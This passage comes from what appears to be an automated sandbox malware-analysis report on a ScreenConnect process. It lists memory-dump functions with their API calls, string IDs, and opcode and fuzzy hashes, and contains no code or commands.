                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 382126B5D002189FDB24CFA9D584BDEBBF1BF08300F24841AE819A7350CB74A846CFA0
                                                                                                                                                                                                                                                        Function 0191FB40 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                                        • Opcode ID: 3085abf5d3f63f92fe75bbaa83de03abac99a87ffdd7ff2e0e76202eaf129620
                                                                                                                                                                                                                                                        • Instruction ID: 073862f26429de705a8d6085cd32d14377a41f8bb0cc98fe1c7f2eee1ae5b5dc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3085abf5d3f63f92fe75bbaa83de03abac99a87ffdd7ff2e0e76202eaf129620
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48D17D74A40709DFCB04DF68D894A99B7B6FF89300B118699E909AB365DB30FC95CF90
                                                                                                                                                                                                                                                        Function 05743C50 Relevance: 1.6, APIs: 1, Instructions: 65pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05743CC8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: 77a9a08d9a0b072a5bc0431b99ac4aa787aa89207aae348f971fb52e80475c78
                                                                                                                                                                                                                                                        • Instruction ID: a59a2db40ccad2621af3c3d4b4d6cbc66d3a5edc41a5b05d8efc972f4b16ae38
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a9a08d9a0b072a5bc0431b99ac4aa787aa89207aae348f971fb52e80475c78
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 372113B1D042589FCB24CFAAD584BDEBBF5BF08310F248469E819AB340C774A845CFA0
                                                                                                                                                                                                                                                        Function 05741E70 Relevance: 1.6, APIs: 1, Instructions: 60pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000), ref: 05741EDF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        • Opcode ID: 327bb520e471c712231609769b020385285d90152ed93958dc61d7e80f99a0fb
                                                                                                                                                                                                                                                        • Instruction ID: 999d259c253086771d9d1c837fc80587b14f8f3dd55ca3c3d00c2119ca5b7180
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 327bb520e471c712231609769b020385285d90152ed93958dc61d7e80f99a0fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF2135B68003098FDB24CF9AD445BDEBBB0EB48310F148429D869A7241C379A586CFA1
                                                                                                                                                                                                                                                        Function 05741E78 Relevance: 1.6, APIs: 1, Instructions: 56pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000), ref: 05741EDF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        • Opcode ID: 9d9ce771ce31da8a19dc17485342c65bda953efe9e389f4d2c591a7f84197e2e
                                                                                                                                                                                                                                                        • Instruction ID: 55d1f13c494f76fe4747b00a7372e31b3cdfd412829989aa79007cad373ee109
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d9ce771ce31da8a19dc17485342c65bda953efe9e389f4d2c591a7f84197e2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521F4B68003198FDB24DF9AC444BEEBBF5EB48310F54842DD869A7240C779A585CFA5
                                                                                                                                                                                                                                                        Function 040D2110 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: [$z
                                                                                                                                                                                                                                                        • API String ID: 0-177125795
                                                                                                                                                                                                                                                        • Opcode ID: c2558c95f8d3f163e56e691beac28e7c6f943e701cf106204c09e890e04f1c23
                                                                                                                                                                                                                                                        • Instruction ID: 49ba0bef902d33a4c1ef8a8fc9f30bd47477410f6e9de161de154aaf79da90f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2558c95f8d3f163e56e691beac28e7c6f943e701cf106204c09e890e04f1c23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12714C347003069BEB04DFA9D49066EF3E7EFD8210B54C5AD9416BB394DEB0EC868B91
                                                                                                                                                                                                                                                        Function 040D2100 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: [$z
                                                                                                                                                                                                                                                        • API String ID: 0-177125795
                                                                                                                                                                                                                                                        • Opcode ID: 7709ba2a0b277aa657778af80bb6ca0213f6aede447c5624fd32e88abab8528e
                                                                                                                                                                                                                                                        • Instruction ID: d2da6244c3a0c3ac3949a1b3a1f6d27940dd3eaddc05d6e44c15dd83756fc702
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7709ba2a0b277aa657778af80bb6ca0213f6aede447c5624fd32e88abab8528e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41716F347003069BEB05DFA8D49466EB3A2EFD8210B50C59DD416BB394DFB1EC868B91
                                                                                                                                                                                                                                                        Function 01915DE0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCq
                                                                                                                                                                                                                                                        • API String ID: 0-2853737484
                                                                                                                                                                                                                                                        • Opcode ID: c59ef535f2e71abe7e5c8cf16368abc68583db1557a9a05bf2b15d21cae72e91
                                                                                                                                                                                                                                                        • Instruction ID: 562486691d0fe1a045361fbd0e6236e7a328666fd09a6d356d285417f418627f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c59ef535f2e71abe7e5c8cf16368abc68583db1557a9a05bf2b15d21cae72e91
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB51C3307003068FEB15EB38C4547AE7BE6AFCA211B5284A8D44ADB355DF74ED86CB91
                                                                                                                                                                                                                                                        Function 01915DF0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCq
                                                                                                                                                                                                                                                        • API String ID: 0-2853737484
                                                                                                                                                                                                                                                        • Opcode ID: 0818aa41d9ad8f4e90a11591547bbe6bd51599b26c0ab8e687f23b34e30842d1
                                                                                                                                                                                                                                                        • Instruction ID: 64f20ef9feeb1b94103fb087bee1d69cacff91d56c6fe59144416f33ce5e0f64
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0818aa41d9ad8f4e90a11591547bbe6bd51599b26c0ab8e687f23b34e30842d1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9851C03170020A8FEB14EB38C554B6E77E6AFC9301B518468E80ADB354EF70EC42CB91
                                                                                                                                                                                                                                                        Function 019191A8 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: t*Xt
                                                                                                                                                                                                                                                        • API String ID: 0-3586738584
                                                                                                                                                                                                                                                        • Opcode ID: 9856df9d1b689f4382f5785042e2bc9bc8cb63ac6d92971a4b97ce1bdb3253aa
                                                                                                                                                                                                                                                        • Instruction ID: 20102c9ecc67c2996c0d524e579a81ee2cb37e86cabe8fdea5646e26a16d942c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9856df9d1b689f4382f5785042e2bc9bc8cb63ac6d92971a4b97ce1bdb3253aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53112171E00208AFEB25CF68D800AEBBBB6EF80315B148966D118D7149D3728A82CB80
                                                                                                                                                                                                                                                        Function 0191C662 Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 07740d4e950863943c1cccbe4e01463092c30a35771f8c6b069a2e72610cbafc
                                                                                                                                                                                                                                                        • Instruction ID: 3e3253833231d938e12909b2633407c0460e9d9643b8baa3d260e3a70fb2c27b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07740d4e950863943c1cccbe4e01463092c30a35771f8c6b069a2e72610cbafc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68B1C430A40349DFDB05DFA8C494AADBBB1FF85300F108599D44AAB366DF74E986CB81
                                                                                                                                                                                                                                                        Function 040D1060 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 126e74c7fd0960174350b0687012e68621e41725ab34baaca85604e2aaec0843
                                                                                                                                                                                                                                                        • Instruction ID: 8d5f50c6e6ee7139bdb2736656c8bb591e552703acfece6953ac1247a1f0a8b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 126e74c7fd0960174350b0687012e68621e41725ab34baaca85604e2aaec0843
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67A1A2706043419FE715EB78D4906DD7BF1FF46300B40CA59C486EB351EBB4BA4A8BA6
                                                                                                                                                                                                                                                        Function 0191D069 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7c5c9de34ed295623cb57a2fe2e0092f1d72fb5bb2d571502be88f53723d9a46
                                                                                                                                                                                                                                                        • Instruction ID: 5acd797e812c41e62dd61729d5076c7eac41a0d4399dcd8ddae398a6088128fc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c5c9de34ed295623cb57a2fe2e0092f1d72fb5bb2d571502be88f53723d9a46
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16A11874A00209CFEB14DFA8D494A9DB7F6BF89304B508568E40AEB365DB70ED81CF90
                                                                                                                                                                                                                                                        Function 040D10D0 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b0bd9c0efe069a45428b6cf2cab22bd41641e4b3e6bf467c214cb6f3d816a44d
                                                                                                                                                                                                                                                        • Instruction ID: 82450d32d9483717b486e037f69ca1f5f20979b749cea25ce8098eaa9966b6f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0bd9c0efe069a45428b6cf2cab22bd41641e4b3e6bf467c214cb6f3d816a44d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C08163706007059FE755EF78D4906DDB7E2FF45704B80CA18C486AB740DBB0BA498BE5
                                                                                                                                                                                                                                                        Function 040D4798 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b051a64ea437d7e00e8935462eff47f75a745eabea39069d255c7d0d8908e4e8
                                                                                                                                                                                                                                                        • Instruction ID: 4eab406e22378e4f6fea6f794720dc127b92ae3fdd6e009554079f87bcf18229
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b051a64ea437d7e00e8935462eff47f75a745eabea39069d255c7d0d8908e4e8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B971B275B002059FDB10EF69D484A9EBBF6FF89614B14446AD90AEB360DF30EC06CB91
                                                                                                                                                                                                                                                        Function 0191EF78 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3140f1a4a806a2fb200d2e45dc1f849bcbc3047300ee44a8d6bbabf8346eedc6
                                                                                                                                                                                                                                                        • Instruction ID: 9c9e8247310fcafee801ca0582a77938f7f963951a07a9f68e0016427e50ad03
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3140f1a4a806a2fb200d2e45dc1f849bcbc3047300ee44a8d6bbabf8346eedc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6616131F002195BEB15EBB9C4906EE7AA6BFC9700F248529D406BB384DF34AD4687D5
                                                                                                                                                                                                                                                        Function 01918D98 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6cb850461f92b6025150549850b6432b0c9e8cdc2a3fca68244d018641356d98
                                                                                                                                                                                                                                                        • Instruction ID: 295d7789061acc2d327a83e6b812b62c065cfd0ceba56be495dea6c8dbdb9f7d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cb850461f92b6025150549850b6432b0c9e8cdc2a3fca68244d018641356d98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2611774B10209DFEB14DF69D894A6EB7B6FF8D205B108068E50AEB365DB70EC41DB80
                                                                                                                                                                                                                                                        Function 0191AAA0 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 69348a6c4fa57b9db599b6cadb3eda892dccd466f31e38b12cc3bee648c869d4
                                                                                                                                                                                                                                                        • Instruction ID: a662b452e70d98c31f30ca0ba5e1a33d0b27176e22b163ecc1311a0f27e56b96
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69348a6c4fa57b9db599b6cadb3eda892dccd466f31e38b12cc3bee648c869d4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55512630B012998FDB258B78D458B6EBBF6BF84301F14896DD80ADB395DB309C85CB81
                                                                                                                                                                                                                                                        Function 040D0417 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: accaab98e733d4a172ff0d65f631592578d73769c58fa30fe71e8eddac2a1960
                                                                                                                                                                                                                                                        • Instruction ID: a4e61f165a18a1e53e6b3553b6e8ff3dcf444372a14f0f1e569e79afaed0b085
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: accaab98e733d4a172ff0d65f631592578d73769c58fa30fe71e8eddac2a1960
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4451C4B1B003459FDB14DB58C5806AEB7F2FF85309F24849AD809EB356D730E94ACB91
                                                                                                                                                                                                                                                        Function 0191E300 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a1b6badb156bf21ffcc259476b89f9a50d737e7ef926b723c1c27809e3fb564b
                                                                                                                                                                                                                                                        • Instruction ID: 647af54ea8050be656b592616b1538714c10eb30d9835affa0989b7d89bb9f4f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1b6badb156bf21ffcc259476b89f9a50d737e7ef926b723c1c27809e3fb564b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20519D30700305DFEB15DF68D484A6AB3EAEFC92047508469E94ADB365DFB0EC828B91
                                                                                                                                                                                                                                                        Function 0191C6D0 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: abf86743b99a7ea1619dcb728c46e80b9036c28441b321650ce278f1cb301916
                                                                                                                                                                                                                                                        • Instruction ID: 4b7f9545899dc45c0dfa9c36d3698c12d22cc1837a7d68a60312fbec8cce3948
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abf86743b99a7ea1619dcb728c46e80b9036c28441b321650ce278f1cb301916
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D619430A40319CFDB16EF68C454A9DBBB1FF85300F118969C84AAB365DB74E9C5CB81
                                                                                                                                                                                                                                                        Function 0191E310 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b6ed5150e2731f236956a55f956b01afd134d226ec5bac8ee7b88a7856885fe4
                                                                                                                                                                                                                                                        • Instruction ID: 2128e05b81db9820b3f534f8fb12563a55124524c146d321100a91dddedf0ca8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6ed5150e2731f236956a55f956b01afd134d226ec5bac8ee7b88a7856885fe4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21516E34700305DFDB15DF6CD484A6AB3EAEFC92047508468E94ADB365DFB0EC828B91
                                                                                                                                                                                                                                                        Function 040D3830 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 552d5e8235e997443c1626fa80ebe5e6dbd2b1ec17b6352f14940d2dbc8b9ff8
                                                                                                                                                                                                                                                        • Instruction ID: 1e30da49142aa0940e0abc259af335f8d8066cf1ac34a19eabdb009a31100d4f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 552d5e8235e997443c1626fa80ebe5e6dbd2b1ec17b6352f14940d2dbc8b9ff8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24412430B003025FE711AB78885062EBBE2BFC5700B54C529E852EB345DFB5EC5ACB92
                                                                                                                                                                                                                                                        Function 040D3860 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ba112907a59f40735d1aa8b44d4fddaa32907da892cb38e316b64051ccc3adce
